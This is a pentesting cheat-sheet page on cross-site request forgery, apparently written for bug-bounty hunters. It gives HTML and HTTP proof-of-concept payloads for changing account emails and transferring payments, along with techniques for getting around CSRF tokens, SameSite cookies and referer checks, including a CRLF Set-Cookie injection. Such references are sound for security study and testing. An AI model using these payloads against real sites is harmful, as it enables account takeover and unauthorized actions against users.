# CSRF

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

{% embed url="<https://blog.intigriti.com/hacking-tools/csrf-a-complete-guide-to-exploiting-advanced-csrf-vulnerabilities>" %}

## Conditions needed

* **A relevant action.** This might be a privileged action (such as modifying permissions for other users) or any action on user-specific data (such as changing the user's own password)
* **Cookie-based session handling.**
* **No unpredictable request parameters.** For example, when causing a user to change their password, the function is not vulnerable if an attacker needs to know the value of the existing password.

## Account Takeover

* Create an account as an attacker and fill all the form, check your info in the Account Detail.
* Change the email and capture the request, then created a CSRF Exploit.

```
POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE

email=wiener@normal-user.com
```

CSRF POST PoC

```
<html>
    <body>
        <form action="https://vulnerable-website.com/email/change" method="POST">
            <input type="hidden" name="email" value="pwned@evil-user.net" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>
```

GET request PoC:

```
<img src="https://vulnerable-website.com/email/change?email=pwned@evil-user.net">
```

Also try with "Reset Password"

## CSRF With Burp

right-click context menu, select Engagement tools / Generate CSRF PoC.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FUBcV00RdRCCGwJWkOnkJ%2Fimage.png?alt=media&#x26;token=78ce8104-e3fc-4595-857f-829ea5541d55" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F3y2mCMWg1igW2x8mNxKM%2Fimage.png?alt=media&#x26;token=54105fda-748d-4081-a67f-8906d3aa1d35" alt=""><figcaption></figcaption></figure>

{% embed url="<https://portswigger.net/support/using-burp-to-test-for-cross-site-request-forgery>" %}

{% embed url="<https://github.com/rammarj/csrf-poc-creator>" %}

## Bypass CSRF Protection

{% embed url="<https://github.com/tuhin1729/Bug-Bounty-Methodology/blob/main/CSRF.md>" %}

{% embed url="<https://github.com/trilokdhaked/Bug-Bounty-Methodology/blob/main/Cross%20Site%20Request%20Forgery.md>" %}

{% embed url="<https://bugbase.ai/blog/how-to-bypass-csrf-protection>" %}

### Bypass CSRF Token - GET Method

Some applications correctly validate the token when the request uses the POST method but skip the validation when the GET method is used.

Switch to the GET method to bypass the validation and deliver a CSRF attack

```
GET /email/change?email=pwned@evil-user.net HTTP/1.1
Host: vulnerable-website.com
Cookie: session=2yQIDcpia41WrATfjPqvm9tOkDvkMvLm
```

```
<form action="https://vulnerable.net/my-account/change-email">
    <input type="hidden" name="email" value="anything%40test.net">
</form>
<script>
        document.forms[0].submit();
</script>
```

### Bypass CSRF Token - Omit the token

Some applications correctly validate the token when it is present but skip the validation if the token is omitted.

```
POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: session=2yQIDcpia41WrATfjPqvm9tOkDvkMvLm

email=pwned@evil-user.net
```

### Bypass CSRF Token - Null token

Try to send `csrftoken=null` or `csrftoken=%00`

Also try to fuzz from %00 to %ff

### Bypass CSRF Token - Use the token of another user

Some applications do not validate that the token belongs to the same session as the user who is making the request

Log in to the application using your own account, obtain a valid token, and then feed that token to the victim user in your CSRF attack

### Bypass CSRF Token - token tied to a non-session cookie

```
POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Cookie: session=pSJYSScWKpmC60LpFOAHKixuFuM4uXWF; csrfKey=rZHCnSzEp8dbI6atzagGoSYyqJqTz5dv

csrf=RhV7yQDO0xcq9gLEah2WVbmuFqyOq7tY&email=victim@normal-user.com
```

Log in to the application using your own account, obtain a valid token and associated cookie, leverage the cookie-setting behavior to place your cookie into the victim's browser, and feed your token to the victim in your CSRF attack.

Create a URL that uses this vulnerability to inject your `csrfKey` cookie into the victim's browser:

```
/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None
```

Create a PoC, ensuring that you include your CSRF token. Remove the auto-submit `<script>` block, and instead add the following code to inject the cookie

```
<img src="https://vulnerable.net/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None" onerror="document.forms[0].submit()">
```

### Bypass CSRF Token - token duplicated in a cookie

The application simply verifies that the token submitted in the request parameter matches the value submitted in the cookie.

Invent a token (perhaps in the required format, if that is being checked), leverage the cookie-setting behavior to place your cookie into the victim's browser, and feed your token to the victim in your CSRF attack.

Create a URL that uses this vulnerability to inject your `csrfKey` cookie into the victim's browser:

```
/?search=test%0d%0aSet-Cookie:%20csrfKey=fake%3b%20SameSite=None
```

Create a PoC, ensuring that you include your CSRF token. Remove the auto-submit `<script>` block, and instead add the following code to inject the cookie

```
<img src="https://vulnerable.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
```

### Bypass SameSite cookie Lax

{% embed url="<https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions>" %}

&#x20;If they also use `Lax` restrictions for their session cookies, either explicitly or due to the browser default, you may still be able to perform a CSRF attack by eliciting a `GET` request from the victim's browser.

```
<script>
    document.location = 'https://vulnerable-website.com/account/transfer-payment?recipient=hacker&amount=1000000';
</script>
```

```
<form action="https://vulnerable-website.com/account/transfer-payment" method="POST">
    <input type="hidden" name="_method" value="GET">
    <input type="hidden" name="recipient" value="hacker">
    <input type="hidden" name="amount" value="1000000">
</form>
```

Try overriding the method by adding the `_method` parameter to the query string:

```
GET /my-account/change-email?email=foo%40test.net&_method=POST HTTP/1.1
```

```
<script>
    document.location = "https://vulnerable.net/my-account/change-email?email=pwned@test.net&_method=POST";
</script>
```

### Bypass SameSite cookie Strict

Look for a gadget that results in a secondary request within the same site.

One possible gadget is a client-side redirect that dynamically constructs the redirection target using attacker-controllable input like URL parameters

```
<script>
    document.location = "https://vulnerable.net/post/comment/confirmation?postId=1/../../my-account/change-email?email=pwned%40test.net%26submit=1";
</script>
```

### Bypass referer-based CSRF defenses

#### 1th method

Drop the referer header in your poc. Include the following code in your PoC:

```
<meta name="referrer" content="never">
```

#### 2nd method

Alter the referer URL

{% hint style="warning" %}
*Make sure that the `Referrer-Policy: unsafe-url` header is set. This ensures that the full URL will be sent, including the query string.*
{% endhint %}

```
http://vulnerable-website.com.attacker-website.com/csrf-attack

http://attacker-website.com/csrf-attack?vulnerable-website.com
```

Edit the PoC JavaScript so that the third argument of the `history.pushState()` function includes a query string with your lab instance URL as follows:

`history.pushState("", "", "/?vulnerable.net")`

This will cause the Referer header in the generated request to contain the URL of the target site in the query string, just like we tested earlier.

## Tool

{% embed url="<https://github.com/0xInfection/XSRFProbe>" %}

{% embed url="<https://github.com/s0md3v/Bolt>" %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FtT3srZzbUxV8iN6zjNrl%2Fimage.png?alt=media&#x26;token=962e4759-e8b9-4e26-b998-6df524fdfaf8" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)

## Resources

{% embed url="<https://portswigger.net/web-security/csrf>" %}

{% embed url="<https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html>" %}

{% embed url="<https://www.intigriti.com/hackademy/cross-site-request-forgery-csrf>" %}